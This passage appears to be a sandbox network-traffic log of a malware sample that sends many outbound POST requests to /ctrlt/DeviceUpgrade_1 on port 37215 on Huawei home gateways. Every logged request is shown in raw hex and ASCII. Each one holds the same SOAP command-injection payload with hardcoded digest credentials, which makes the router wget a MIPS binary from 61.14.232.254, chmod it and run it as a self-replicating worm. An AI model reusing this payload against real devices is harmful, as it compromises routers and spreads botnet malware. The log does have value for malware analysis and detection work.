20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1168192.168.2.1338690197.77.107.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.519835949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1169192.168.2.1334824197.165.89.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.519928932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1170192.168.2.133469286.49.30.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.519953012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1171192.168.2.1356228151.142.188.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.520045042 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1172192.168.2.1352142157.221.70.14637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.520184040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1173192.168.2.1347852157.87.221.3937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.520211935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1174192.168.2.1359988157.48.82.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.520241022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1175192.168.2.1333412197.152.32.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.520307064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1176192.168.2.1350666201.211.121.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.520437002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1177192.168.2.1356184157.13.77.25337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.520664930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1178192.168.2.1342006157.205.88.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.520698071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
